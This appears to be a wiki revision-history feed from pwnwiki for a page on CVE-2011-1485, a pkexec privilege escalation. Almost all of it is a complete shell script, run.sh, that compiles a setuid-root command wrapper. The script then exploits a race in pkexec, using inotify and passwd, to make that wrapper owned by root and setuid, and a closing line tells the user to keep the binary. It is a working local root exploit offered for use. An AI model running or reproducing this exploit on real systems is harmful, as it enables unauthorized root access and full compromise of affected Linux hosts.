https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2011-1485_pkexec%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E
CVE-2011-1485 pkexec特權提升漏洞 - Revision history
2026-04-18T08:33:42Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2011-1485_pkexec%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&diff=956&oldid=prev
Pwnwiki: Created page with "==run.sh== <pre> # modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh # for rdot.org cat > suid.c << _EOF #include <stdio.h> #include <stdlib.h..."
2021-04-03T06:27:20Z
<p>Created page with "==run.sh== <pre> # modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh # for rdot.org cat > suid.c << _EOF #include <stdio.h> #include <stdlib.h..."</p>
<p><b>New page</b></p><div>==run.sh==<br />
<pre><br />
# modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh<br />
# for rdot.org<br />
cat > suid.c << _EOF<br />
#include <stdio.h><br />
#include <stdlib.h><br />
main(int argc, char *argv[])<br />
{<br />
if(argc == 2) {<br />
setgid(0); setuid(0);<br />
system(argv[1]); }<br />
return 0;<br />
}<br />
_EOF<br />
cat > makesuid.c << _EOF<br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <unistd.h><br />
#include <sys/types.h><br />
#include <sys/inotify.h><br />
int main(int argc, char **argv)<br />
{<br />
if (fork() != 0)<br />
{ <br />
int fd;<br />
char pid_path[15];<br />
sprintf(pid_path, "/proc/%i", getpid());<br />
close(0); close(1); close(2);<br />
fd = inotify_init();<br />
inotify_add_watch(fd, pid_path, IN_ACCESS);<br />
read(fd, NULL, 0);<br />
execl("/usr/bin/passwd", "/usr/bin/passwd", NULL); <br />
} <br />
else<br />
{<br />
execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL);<br />
}<br />
<br />
return 0;<br />
}<br />
<br />
_EOF<br />
gcc -o suid suid.c<br />
gcc -o makesuid makesuid.c<br />
./makesuid chown root:root $PWD/suid<br />
./makesuid chmod u+s $PWD/suid<br />
echo "your suid is on ./suid make sure u move this !!!"<br />
rm suid.c makesuid.c makesuid<br />
$PWD/suid -c /usr/bin/id<br />
<br />
</pre></div>
Pwnwiki